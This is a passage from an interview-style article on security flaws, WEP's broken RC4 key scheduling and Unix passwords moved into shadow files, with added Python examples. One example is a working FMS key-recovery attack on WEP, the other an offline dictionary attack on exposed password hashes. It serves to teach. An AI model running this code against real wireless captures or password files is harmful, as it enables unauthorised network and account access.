in a way which does not cause the
problems seen in WEP. Nevertheless, the flaw exists in the
RC4 cryptosystem itself, or at least in its key scheduling
algorithm (KSA) [7], rather than simply in WEP's
implementation: for certain values of the per-packet IV, which
WEP simply prepends to the secret key, the first byte of
keystream is strongly correlated with one byte of the key, and
the first byte of plaintext in every WEP frame is predictable.
This statistical flaw allows an attacker to recover a WEP key
by capturing and analysing a few million wireless packets
(later refinements of the attack need far fewer). So there is
no way to fix WEP without changing it for something
different. WEP is irrevocably broken.
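The following is an added example, not code from the original article or from reference [7]. It implements standard RC4 and the key-recovery idea described above: frames sent under "weak" IVs of the form (B+3, 255, x) leave the KSA in a state where the first keystream byte leaks secret key byte B about 5% of the time; voting over a few hundred such frames per byte, with a small fudge-factor search verified against captured frames, recovers the whole key. The 40-bit secret, the IV set and the "captured" frames are constructed inside the block; only the first ciphertext byte per frame is used, XORed with the known SNAP byte 0xAA.

```python
"""Added example: FMS-style recovery of a WEP key from the first keystream
byte of frames sent under weak IVs. RC4 here is the standard algorithm; the
40-bit secret, the IVs and the captured frames are constructed for the demo."""
from collections import Counter

N = 256
SNAP_FIRST_BYTE = 0xAA  # every WEP data frame starts with LLC/SNAP 0xAA


def ksa(key):
    """RC4 key-scheduling algorithm (key is a sequence of byte values)."""
    S = list(range(N))
    j = 0
    for i in range(N):
        j = (j + S[i] + key[i % len(key)]) % N
        S[i], S[j] = S[j], S[i]
    return S


def first_keystream_byte(S):
    """First output of the RC4 PRGA: i = 1, j = S[1], swap, emit S[S[i] + S[j]]."""
    S = S[:]
    i, j = 1, S[1]
    S[i], S[j] = S[j], S[i]
    return S[(S[i] + S[j]) % N]


def wep_keystream_byte(iv, secret):
    """WEP's per-frame RC4 key is simply IV || secret."""
    return first_keystream_byte(ksa(list(iv) + list(secret)))


def weak_ivs(B):
    """IVs (B+3, 255, x): after B+3 KSA steps they leave S[1] = 0 and
    S[0] = B+3, the 'resolved' state that exposes secret key byte B."""
    return [(B + 3, 255, x) for x in range(N)]


def capture(secret, ivs):
    """Constructed stand-in for sniffed frames: (IV, first ciphertext byte)."""
    return [(iv, wep_keystream_byte(iv, secret) ^ SNAP_FIRST_BYTE) for iv in ivs]


def vote_for_key_byte(B, known, frames):
    """Tally FMS candidates for secret byte B, given secret bytes 0..B-1."""
    votes = Counter()
    for iv, c0 in frames:
        out = c0 ^ SNAP_FIRST_BYTE                  # first keystream byte
        key_prefix = list(iv) + list(known)         # the B+3 key bytes we know
        S, j = list(range(N)), 0
        for i in range(B + 3):                      # replay the KSA that far
            j = (j + S[i] + key_prefix[i]) % N
            S[i], S[j] = S[j], S[i]
        # Resolved condition: S[1] < B+3 and S[1] + S[S[1]] == B+3. If the
        # rest of the KSA then leaves positions 1, S[1] and B+3 alone (about
        # e^-3, i.e. 5%, of the time) the first keystream byte is exactly the
        # value swapped into S[B+3] at step B+3, which pins down key byte B.
        if S[1] >= B + 3 or (S[1] + S[S[1]]) % N != B + 3:
            continue
        votes[(S.index(out) - j - S[B + 3]) % N] += 1
    return votes


def recover_key(frames, key_len, depth=3):
    """Byte-by-byte recovery with a fudge factor: try the top `depth` vote
    winners per byte and verify a complete key against a few frames."""
    check = frames[:8]   # a wrong key passes all eight with probability 256^-8

    def search(known):
        if len(known) == key_len:
            key = bytes(known)
            ok = all(wep_keystream_byte(iv, key) ^ SNAP_FIRST_BYTE == c0
                     for iv, c0 in check)
            return key if ok else None
        for cand, _ in vote_for_key_byte(len(known), known, frames).most_common(depth):
            key = search(known + [cand])
            if key is not None:
                return key
        return None

    return search([])


SECRET = bytes([0x1F, 0x4B, 0xA2, 0x77, 0xC3])   # constructed 40-bit WEP key
FRAMES = capture(SECRET, [iv for B in range(len(SECRET)) for iv in weak_ivs(B)])

if __name__ == "__main__":
    found = recover_key(FRAMES, len(SECRET))
    print("recovered", found.hex(), "from", len(FRAMES), "frames")
```

Real captures contain random IVs, so the attacker filters for the weak class (or applies the resolved test directly, as vote_for_key_byte does) and waits until enough have gone by; that is where the "few million packets" of the original attack come from, since only 1 IV in 65536 belongs to a given class.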
Q. How about a system which was based on sound
cryptography but implemented dangerously?
A simple example of an implementation flaw – one which
was fixed by devising an alternative but compatible approach
– is the way early Unix systems stored their password file. All
users and programs need read access to this file, as it is
(amongst other things) the database which maps usernames,
such as ‘fp’, onto real names, such as ‘Ford Prefect’.
However, early Unix implementations also stored each user’s
hashed password in this file, so anyone could retrieve the
hashes and perform a dictionary attack against them off-line.
This meant that weak passwords could quickly be recovered
without leaving evidence of the dictionary attack on the
targeted system.
The backward-compatible solution, used in Linux to this
day, was to split the password file in two: the hashes were
moved into a second file, the shadow file, which is
read-protected so that only root can open it, and the password
field in the world-readable file was replaced with a dud entry,
such as 'x'.
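To make the difference concrete, here is an added example (not from the original article) that parses the passwd(5) and shadow(5) record layouts, works out which hashes an unprivileged process can copy off the machine under the old and the shadowed layouts, and runs the offline dictionary attack against them. The user records, the word list and the file modes are constructed; the hash function is a labelled stand-in for crypt(3), chosen only so the block runs without the deprecated `crypt` module.

```python
"""Added example: world-readable hashes in the old passwd file versus the
shadow layout. Record formats are the real passwd(5)/shadow(5) layouts; the
users, word list and hash function are constructed for the demo."""
import hashlib
import stat


def demo_crypt(password, salt):
    """Stand-in for crypt(3). Assumption: real shadow entries hold crypt(3)
    strings such as $6$salt$...; salted SHA-512 in the same $id$salt$hash
    shape is used here so the example runs anywhere."""
    digest = hashlib.sha512((salt + password).encode()).hexdigest()
    return "$demo$%s$%s" % (salt, digest)


def parse_passwd(text):
    """passwd(5): name:password:uid:gid:gecos:home:shell, one user per line."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, pw, uid, gid, gecos, home, shell = line.split(":")
        users[name] = {"pw": pw, "uid": int(uid), "gid": int(gid),
                       "gecos": gecos, "home": home, "shell": shell}
    return users


def parse_shadow(text):
    """shadow(5): name:hash:lastchange:min:max:warn:inactive:expire:reserved."""
    entries = {}
    for line in text.splitlines():
        if line:
            fields = line.split(":")
            entries[fields[0]] = fields[1]
    return entries


def hashes_readable_by(is_root, passwd_text, shadow_text, shadow_mode):
    """Hashes a process could copy for an offline attack. The passwd file is
    always world-readable (programs need the uid and GECOS mappings); the
    shadow file only if we are root or its mode grants other-read. Group
    access (e.g. a `shadow` group) is left out for brevity."""
    readable = {}
    for name, rec in parse_passwd(passwd_text).items():
        if rec["pw"] not in ("x", "*", "!", "!!", ""):   # placeholders, not hashes
            readable[name] = rec["pw"]
    if is_root or shadow_mode & stat.S_IROTH:
        readable.update(parse_shadow(shadow_text))
    return readable


def dictionary_attack(hashes, wordlist):
    """Offline guess-and-compare. No login attempt touches the target, so the
    target logs nothing; the attacker's CPU does all the work."""
    cracked = {}
    for name, stored in hashes.items():
        parts = stored.split("$")            # ['', id, salt, digest]
        if len(parts) < 4:
            continue
        salt = parts[2]
        for word in wordlist:
            if demo_crypt(word, salt) == stored:
                cracked[name] = word
                break
    return cracked


# Constructed records: a weak password for 'fp', a strong one for root.
FP_HASH = demo_crypt("towel", "Zz")
ROOT_HASH = demo_crypt("correct horse battery staple", "Rt")
OLD_PASSWD = ("root:%s:0:0:root:/root:/bin/sh\n"
              "fp:%s:1000:1000:Ford Prefect:/home/fp:/bin/sh\n") % (ROOT_HASH, FP_HASH)
NEW_PASSWD = ("root:x:0:0:root:/root:/bin/sh\n"
              "fp:x:1000:1000:Ford Prefect:/home/fp:/bin/sh\n")
NEW_SHADOW = ("root:%s:19000:0:99999:7:::\n"
              "fp:%s:19000:0:99999:7:::\n") % (ROOT_HASH, FP_HASH)
WORDLIST = ["password", "42", "zaphod", "towel", "marvin"]


def crack_as_unprivileged_user(passwd_text, shadow_text, shadow_mode):
    """What a normal user on the box could crack from the files alone."""
    return dictionary_attack(
        hashes_readable_by(False, passwd_text, shadow_text, shadow_mode), WORDLIST)


if __name__ == "__main__":
    print("old layout:         ", crack_as_unprivileged_user(OLD_PASSWD, "", 0o600))
    print("shadow, mode 0640:  ", crack_as_unprivileged_user(NEW_PASSWD, NEW_SHADOW, 0o640))
    print("shadow, mode 0644:  ", crack_as_unprivileged_user(NEW_PASSWD, NEW_SHADOW, 0o644))
```

The third call is the check a practitioner should keep in mind: the shadow mechanism protects nothing if the shadow file's permissions drift to world-readable, which is why audit tooling checks the mode of the shadow file rather than merely its existence.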
User programs worked exactly as before, except that they saw
dud information for the password hash, which they